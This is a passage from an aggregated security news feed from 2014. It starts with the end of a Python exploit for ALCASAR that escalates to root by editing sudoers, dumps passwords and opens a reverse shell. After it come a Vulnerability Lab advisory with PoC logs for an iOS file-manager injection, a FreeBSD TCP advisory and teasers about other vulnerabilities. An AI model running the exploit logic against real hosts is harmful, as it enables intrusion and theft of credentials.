            print '[!] Need IP and port for the reverse shell...'
            sys.exit(0)
        rip = sys.argv[3]
        rport = sys.argv[4]

    exploit = PWN_Alcasar(sys.argv[1])
    print '[-] whoami (should be apache):'
    exploit.exec_cmd('id', output=True)
    print '[+] On the way to the uid 0...'
    exploit.edit_sudoers()
    print '[-] Got root?'
    exploit.exec_cmd('id', output=True)
    exploit.lolz()
    if exploit.root:
        print '[+] Here are some passwords for you (again):'
        exploit.read_passwords()
    if cmd == 'reverseshell':
        print '[+] You should now have a shell on %s:%s' % (rip, rport)
        exploit.reverse_shell(rip, rport)
    else:
        print '[+] Your command Sir:'
        exploit.exec_cmd(cmd, output=True)
    sys.exit(1)



//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Archie: Just another Exploit kit

September 15, 2014, 5:14 pm
$
0
0
We have previously described how Exploit Kits are some of the favorite techniques used by cybercriminals to install malicious software on victims' systems. The number of Exploit Kits available has experienced exponential growth in the last few years. Since Blackhole’s author was arrested in 2013, the number of Exploit Kits has increased - including Neutrino, Magnitude, Nuclear, Rig and Angler. In this blog post we discuss Archie, an Exploit Kit that was first discovered by William Metcalf at EmergingThreats. Archie is a really basic Exploit Kit that uses different exploit modules copied from the Metasploit Framework. - See more at: http://www.alienvault.com/open-threat-exchange/blog/archie-just-another-exploit-kit#sthash.55GGF070.dpuf

Introducing paste searches and monitoring for “Have I been pwned?”

September 15, 2014, 5:19 pm
$
0
0
I’ve got 174,451,409 breached accounts in Have I been pwned? (HIBP) as of today which probably sounds like a lot, but it’s not. Why is it not a lot? Because whilst that list spans a lot of the big breaches I could get my hands on, as of the middle of this year (now a couple of months ago already), there were over half a billion accounts breached in just six months. That’s just nuts and as that article explains, its set us on a track that will make 2014 the most hacked year to date by a fairly significant margin over last year which was the previous most hacky year.

more here...........http://www.troyhunt.com/2014/09/introducing-paste-searches-and.html

Beyond Automated Unpacking: Extracting Decrypted/Decompressed Memory Blocks

September 16, 2014, 3:27 am
$
0
0
It’s been about a year and a half since I wrote about a behavioural approach to automated unpacking, and I figured it was time to add some more functionality to unpack.py. This time, I’m going to look at malware decrypting/decompressing code from within itself, and process hollowing, and see if we can capture the decrypted/decompressed/newly written memory. Let’s spruce unpack.py up a tad.

more here...........http://malwaremusings.com/2014/09/16/beyond-automated-unpacking-extracting-decrypteddecompressed-memory-blocks/

OS X IOKit kernel code execution due to controlled kmem_free size in IOSharedDataQueue

September 16, 2014, 5:32 am
$
0
0
IOSharedDataQueue is used by OS X kernel drivers to implement a user/kernel queue in shared memory.

The memory which is mapped into userspace is represented by the variable-sized struct IODataQueueMemory:

typedef struct _IODataQueueMemory {
      UInt32 queueSize;
      volatile UInt32 head;
      volatile UInt32 tail;
      IODataQueueEntry queue[1];
} IODataQueueMemory;

This is allocated on the kernel heap with IOMallocAligned (the size is rounded up to the nearest page_size multiple.) This size is stored in the queueSize field.

Kernel code can call IOSharedDataQueue::getMemoryDescriptor to wrap these pages in an IOMemoryDescriptor which can then be mapped into the userspace task (via IOConnectMapMemory.)

When the IOSharedDataQueue is destructed its ::free method passes the queueSize to kmem_free, which simply removes the corresponding number of pages from the kernel_map. If userspace increased the value of the queueSize field this will remove more pages than were allocated - potentially removing other live allocations from the map.

This could be leveraged for code execution by, for example, forcing these free pages to be reallocated with controlled data before they are accessed.



more here.............https://code.google.com/p/google-security-research/issues/detail?id=35

USB&WiFi Flash Drive v1.3 iOS - Code Execution Vulnerability

September 16, 2014, 5:36 am
$
0
0
Document Title:
===============
USB&WiFi Flash Drive v1.3 iOS - Code Execution Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1316


Release Date:
=============
2014-09-15


Vulnerability Laboratory ID (VL-ID):
====================================
1316


Common Vulnerability Scoring System:
====================================
9


Product & Service Introduction:
===============================
The app take advantage of the free space of iPhone to store vast amounts of files. Supports both wireless and usb transferring.
Compatible with Windows 7, Windows XP, Windows Vista, Mac OS 10+ and Linux. It`s also an ALL-IN-1 reader and file browser. Images, videos,
music, documents are all supported: jpg, jpeg, png, tiff, tif, bmp, BMPf, ico, cur, xbm, mov, mp4, mpv, 3gp, aac, adts, ac3, aif, aiff, aifc,
caf, mp3, mp4, m4a, m4r, snd, au, sd2, wav, doc, xls, ppt, pdf, rtf, key, numbers, pages, gif, txt, html, htm.

( Copy of the Homepage: https://itunes.apple.com/us/app/usb-wi-fi-flash-drive-free/id503106759 )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research team discovered a code execution vulnerability in the official USB & Wi-Fi Flash Drive v1.3 iOS mobile web-application.


Vulnerability Disclosure Timeline:
==================================
2014-09-15: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Leping Li
Product: USB & Wi-Fi Flash Drive - iOS Mobile Web Application (Wifi) 1.3


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Critical


Technical Details & Description:
================================
A remote code execution web vulnerability has been discovered in the official USB & Wi-Fi Flash Drive v1.3 iOS mobile web-application.
The vulnerability allows remote attackers to execute own system (device) specific codes to compromise the ios mobile application.

The remote code execution vulnerability is located in the name value of the cgi/newfolder/ function module. Remote attackers are able to
execute system specific codes in the GET method request of the insecure add `new folder` function. The execution takes place through
the name value of the items. The execution itself occurs in the index file manager listing of the wifi flash drive mobile application.
There is no filter mechanism or protection module to parse available that needs to be bypassed to provoke the execution. The attack vector
of the issue is location on the application-side and the request method to execute code is GET.

The security risk of the code execution vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 8.9.
Exploitation of the code execution vulnerability requires no privileged account or user interaction. Successful exploitation of the remote
vulnerability results in mobile application or device compromise.

Request Method(s):
                                [+] GET

Vulnerable Module(s):
                                [+] cgi/newfolder/

Vulnerable Parameter(s):
                                [+] name

Affected Module(s):
                                [+] WiFi File Manager


Proof of Concept (PoC):
=======================
The remote code execution web vulnerability can be exploited by remote attackers in the wifi network without user interaction or privileged account.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: Wi-Fi Manager - Index Listing

<div id="photo_list_container" class="list" style="display: block;">
<ul id="photo_list" class="photocontainer"><li><a alt="1026" class="videolink" href="###">
<img style="width: 120px; height: 120px;" onload="autoResizePhotoThumb(this);" src="/cgi/thumb/1026"></a>
<span class="namespan">[CODE EXECUTION IN DIRECTORY PATH VALUE!]%3E</span><span class="downloadspan">
<a target="_blank" href="/fd-down/cgi/download/1026/[CODE EXECUTION IN DIRECTORY PATH VALUE!]%3E"><img src="/img/download.png"></a></span></li>
<li><a alt="1027" class="videolink" href="###"><img style="width: 120px; height: 120px;" onload="autoResizePhotoThumb(this);" src="/cgi/thumb/1027"></a>
<span class="namespan">[CODE EXECUTION IN DIRECTORY PATH VALUE!]%3E></span><span class="downloadspan">
<a target="_blank" href="/fd-down/cgi/download/1027/asdasdasd <[CODE EXECUTION IN DIRECTORY PATH VALUE!]%3E>">
<img src="/img/download.png"></a></span></li></iframe></span></li>
<li><a alt="1028" class="videolink" href="###"><img style="width: 120px; height: 120px;" onload="autoResizePhotoThumb(this);" src="/cgi/thumb/1028"></a>
<span class="namespan">[CODE EXECUTION IN DIRECTORY PATH VALUE!]%3E <[CODE EXECUTION IN DIRECTORY PATH VALUE!]%3E"></span><span class="downloadspan">
<a target="_blank" href="/fd-down/cgi/download/1028/[CODE EXECUTION IN DIRECTORY PATH VALUE!]%3E>"><img src="/img/download.png"></a></span></li></iframe></span></li></ul>
<div class="pagecontrol"><p id="page_control">1</p></div></div></div></div><div class="footer"><p>©2011- Wi-Fi Manager</p></div></div>


--- PoC Session Logs [GET] (EXEC CGI) ---
Status: 200[OK]
 GET http://ipad.localhost:8080/cgi/newfolder/[CODE EXECUTION IN DIRECTORY PATH VALUE!]%3E?0.7475382169664659 Load Flags[LOAD_BACKGROUND  ] Größe des Inhalts[12] Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[ipad.localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[application/json, text/javascript, */*]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      X-Requested-With[XMLHttpRequest]
      Referer[http://ipad.localhost:8080/]
      Connection[keep-alive]
   Response Header:
      Content-Length[12]
      Connection[close]

Status: 200[OK]
GET http://ipad.localhost:8080/[CODE EXECUTION IN DIRECTORY PATH VALUE!] Load Flags[LOAD_DOCUMENT_URI  ] Größe des Inhalts[916] Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[ipad.localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://ipad.localhost:8080/]
      Connection[keep-alive]
   Response Header:
      Content-Length[916]
      Connection[close]



Reference(s):
http://ipad.localhost:8080/cgi/newfolder/
http://ipad.localhost:8080/cgi/
http://ipad.localhost:8080/


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the new folder input in the cgi path. Restrict the name input and filter to prevent code
execution in the path values of the application. Encode and filter also the name output value in the wifi file manager index item listing module to prevent exploitation.


Security Risk:
==============
The security risk of the code execution web vulnerability in the new folder cgi module is estimated as critical.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com         - research@vulnerability-lab.com                        - admin@evolution-sec.com
Section:    dev.vulnerability-db.com            - forum.vulnerability-db.com                            - magazine.vulnerability-db.com
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

                                Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
Search

Denial of Service in TCP packet processing

September 16, 2014, 10:03 am
$
0
0 
=============================================================================
FreeBSD-SA-14:19.tcp                                        Security Advisory
                                                          The FreeBSD Project

Topic:          Denial of Service in TCP packet processing

Category:       core
Module:         inet
Announced:      2014-09-16
Credits:        Jonathan Looney (Juniper SIRT)
Affects:        All supported versions of FreeBSD.
Corrected:      2014-09-16 09:48:35UTC (stable/10, 10.1-PRERELEASE)
                2014-09-16 09:48:35 UTC (stable/10, 10.1-BETA1-p1)
                2014-09-16 09:50:19 UTC (releng/10.0, 10.0-RELEASE-p9)
                2014-09-16 09:49:11 UTC (stable/9, 9.3-STABLE)
                2014-09-16 09:50:19 UTC (releng/9.3, 9.3-RELEASE-p2)
                2014-09-16 09:50:19 UTC (releng/9.2, 9.2-RELEASE-p12)
                2014-09-16 09:50:19 UTC (releng/9.1, 9.1-RELEASE-p19)
                2014-09-16 09:49:11 UTC (stable/8, 8.4-STABLE)
                2014-09-16 09:50:19 UTC (releng/8.4, 8.4-RELEASE-p16)
CVE Name:       CVE-2004-0230

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:http://security.FreeBSD.org/>.

I.   Background

The Transmission Control Protocol (TCP) of the TCP/IP protocol suite
provides a connection-oriented, reliable, sequence-preserving data
stream service.  New TCP connections are initiated using special SYN
flag in a datagram.  Sequencing of data is controlled by 32-bit sequence
numbers, that start with a random value and are increased using modulo
2**32 arithmetic.  TCP endpoints maintain a window of expected, and
thus allowed, sequence numbers for a connection.

II.  Problem Description

When a segment with the SYN flag for an already existing connection arrives,
the TCP stack tears down the connection, bypassing a check that the
sequence number in the segment is in the expected window.

III. Impact

An attacker who has the ability to spoof IP traffic can tear down a
TCP connection by sending only 2 packets, if they know both TCP port
numbers.  In case one of the two port numbers is unknown, a successful
attack requires less than 2**17 packets spoofed, which can be
generated within less than a second on a decent connection to the
Internet.

IV.  Workaround

It is possible to defend against these attacks with stateful traffic
inspection using a firewall.  This can be done by enabling pf(4) on
the system and creating states for every connection.  Even a default
ruleset to allow all traffic would be sufficient to mitigate this
issue.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch http://security.FreeBSD.org/patches/SA-14:19/tcp.patch
# fetch http://security.FreeBSD.org/patches/SA-14:19/tcp.patch.asc
# gpg --verify tcp.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:http://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

3) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/8/                                                         r271668
releng/8.4/                                                       r271669
stable/9/                                                         r271668
releng/9.1/                                                       r271669
releng/9.2/                                                       r271669
releng/9.3/                                                       r271669
stable/10/                                                        r271667
releng/10.0/                                                      r271669
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NNNNNN with the revision number, on a
machine with Subversion installed:

# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NNNNNN with the revision number:

<URL:http://svnweb.freebsd.org/base?view=revision&revision=NNNNNN>

VII. References

<URL:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0230>

The latest revision of this advisory is available at
<URL:http://security.FreeBSD.org/advisories/FreeBSD-SA-14:19.tcp.asc>

Rogue E-Books Could Pose Threat to Amazon Accounts

September 16, 2014, 11:22 am
$
0
0
It seems there’s an issue for Amazon Kindles owners should be aware of and take appropriate steps to avoid.

A security researcher discovered malicious code that could potentially be injected – and cookies stolen – via a stored cross site scripting attack on the Manage your Kindle page located on the Amazon website.

more here..........https://blog.malwarebytes.org/security-threat/2014/09/rogue-e-books-could-pose-threat-to-amazon-accounts/

Leveraging LFI To Get Full Compromise On WordPress Sites

September 16, 2014, 11:23 am
$
0
0
In this post I will discuss how a serious but mostly ignored vulnerability can lead to a full compromise of a WordPress site. The key in this attack is how WordPress handles authentication allowing a brute force attack if the secret salt and key values stored in wp-config.php are exposed. IF an innocuous LFI (local file inclusion) or accidental leak of this data by a backup or copy of wp-config.php is successful, then an attacker could generate their own valid auth tokens and gain full access to the site’s admin pages without being detected.

more here...........http://blog.spiderlabs.com/2014/09/leveraging-lfi-to-get-full-compromise-on-wordpress-sites.html

Paper: Fine grain Cross-VM Attacks on Xen and VMware are possible!

September 16, 2014, 11:26 am
$
0
0
This work exposes further vulnerabilities in virtualized
cloud servers by mounting Cross-VM cache attacks in
Xen and VMware VMs targeting AES running in the
victim VM. Even though there exists a rich literature on
cache attacks on AES, so far only a single work, demonstrating
a working attack on an ARM platform running
a L4Re virtualization layer has been published. Here
we show that AES in a number popular cryptographic
libraries including OpenSSL, PolarSSL and Libgcrypt
are vulnerable to Bernstein’s correlation attack when run
in Xen and VMware (bare metal version) VMs, the most
popular VMs used by cloud service providers (CSP) such
as Amazon and Rackspace. We also show that the vulnerability
 persists even if the VMs are placed on different
cores in the same machine. The results of this study
shows that there is a great security risk to AES and (data
encrypted under AES) on popular cloud services


more here............https://eprint.iacr.org/2014/248.pdf

CVE-2014-6283: Privilege Escalation Vulnerability and Potential Remote Code Execution in SAP Adaptive Server Enterprise

September 16, 2014, 12:40 pm
$
0
0
On May 12, 2014, SAP published updates to Adaptive Server Enterprise versions 15.0. 15.5 and 15.7 on all platforms. These updates addressed a security flaw in a built-in procedure implementation. The flaw allows any authenticated database user to overwrite the master encryption key or execute arbitrary code in the database server process context. Below I will discuss in detail what happens inside the server when the vulnerable procedure is invoked.

more here..............http://blog.spiderlabs.com/2014/09/cve-2014-6283-sap-ase-missing-authorization-checks-and-arbitrary-code-execution.html
Viewing all 8064 articles
Browse latest View live
Search